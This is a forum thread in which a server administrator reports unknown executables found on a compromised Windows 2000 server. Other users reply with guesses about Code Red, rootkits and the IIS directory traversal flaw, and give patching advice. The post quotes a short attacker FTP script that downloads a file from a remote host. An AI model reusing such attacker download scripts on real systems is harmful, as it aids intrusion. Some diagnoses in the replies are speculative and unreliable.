General discussion

  • Creator
  • #2317072

    Suspicious files


    by kevin at alexander group ·

    On a routine check of a client’s Win2K Server, I found the following files in the root of C:.
    superrofl.exe, info.exe, root.exe, shell.exe, and http://ftp.txt. The txt file contained the following text:
    open ur momma
    get CDIR.txt c:\CDIR.txtI have removed the files from the system (but kept copies). I have found no information on any attack or exploit along these lines. I was interested if anyone had information or suggestions for any other checks I should do.

All Comments

  • Author
    • #2740329

      Suspicious files

      by blackdiamond ·

      In reply to Suspicious files


      Root.exe can be related to the Code Red virus. I would make sure that you do a Virus scan with an AV program that is running the latest scan definitions.

      If you are running 2000 with IIS installed make sure that it is updated with the latest Microsoft patches.


    • #2740293

      Suspicious files

      by riverfreight ·

      In reply to Suspicious files

      Go to Discussions and read ‘Data transfer & Access.

      With that, this: it has been found that a lot of components are used in the supposedly new box; and is it possible that there is an after hours user or someone who lost it in a transfer and it found a home here?


    • #2741114

      Suspicious files

      by curacao_dejavu ·

      In reply to Suspicious files

      Here’s the link on how various security tools of ms products.


    • #2740757

      Reply To: Suspicious files

      by joseph moore ·

      In reply to Suspicious files

      This server has been compromised, from what I have read. I think it is a “rootkit” which is never good.
      The server probably needs to be patched now. I bet it is not on SP3, is it? If not, then it is vulnerable to the IIS Unicode Directory Traversal Exploit that did make CodeRed and Nimda so popular.
      Lock this machine down now! Run anti-virus software on it to detect trojan files. Check out the firewall settings on whatever firewall protects it (if it IS protected by a firewall).
      I think that “superrofl.exe” is a command prompt that allows the directory traversal to happen.

      Sorry for the bad news.

Viewing 3 reply threads